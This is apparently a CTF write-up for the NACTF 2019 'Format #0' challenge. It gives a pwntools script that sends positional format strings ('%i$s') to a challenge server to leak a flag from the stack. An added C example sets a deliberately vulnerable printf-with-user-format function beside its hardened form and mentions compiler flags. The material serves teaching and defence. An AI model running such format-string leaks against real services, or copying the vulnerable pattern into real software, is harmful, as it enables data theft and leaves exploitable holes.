ctftime

My solutions for various CTF challenges


Format #0

Binary Exploitation - Points: 200

Someone didn’t tell Chaddha not to give user input as the first argument to printf() - use it to leak the flag!

Connect at shell.2019.nactf.com:31782

format-0.c

format-0

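The script sends the format string %i$s with an increasing offset i, so that printf() treats each successive argument slot on the stack as a string pointer and prints whatever it points to. At some offset the slot points to the buffer that contains the flag, and the flag is printed.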

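from pwn import *

# Try each positional argument in turn: %i$s makes printf() treat the
# i-th argument slot as a char* and print the string it points to.
for i in range(50):
	r = remote('ingress.cluster.nactf.com', 31782)
	r.sendline('%{}$s'.format(i).encode())
	# recvall() reads until the server closes the connection
	print(r.recvall())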
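Seen from the code side, the bug class the challenge text describes and its fix look like this. This is an added example, not the challenge's format-0.c or code from the original write-up; the function names and the sample strings are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Count printf conversion directives in s, including the positional
 * "%N$" form; "%%" is a literal percent sign and is not counted. */
int count_directives(const char *s) {
    int n = 0;
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }          /* escaped percent */
        const char *p = s;
        while (isdigit((unsigned char)*p)) p++;     /* width or position */
        if (*p == '$') p++;                         /* positional argument */
        p += strspn(p, "-+ #0123456789.*hlLqjzt");  /* flags, width, length */
        if (*p != '\0' && strchr("diouxXeEfFgGaAcspn", *p)) n++;
    }
    return n;
}

/* Vulnerable pattern the challenge text describes: the untrusted string
 * is the format itself, so printf-family code interprets its directives. */
int render_vulnerable(char *out, size_t n, const char *user) {
    return snprintf(out, n, user);
}

/* Hardened form: constant format, untrusted string passed only as data. */
int render_safe(char *out, size_t n, const char *user) {
    return snprintf(out, n, "%s", user);
}

int main(void) {
    const char *samples[] = { "hello", "100%%", "%7$s" };  /* constructed */
    char buf[64];
    for (size_t i = 0; i < 3; i++) {
        render_safe(buf, sizeof buf, samples[i]);
        printf("%-6s directives=%d safe=\"%s\"\n", samples[i],
               count_directives(samples[i]), buf);
    }
    render_vulnerable(buf, sizeof buf, "100%%");  /* "%%" takes no argument */
    printf("vulnerable(\"100%%%%\") -> \"%s\"\n", buf);
    return 0;
}
```

Compilers flag the vulnerable call with -Wformat-security; building with -Werror=format-security turns that warning into a build failure.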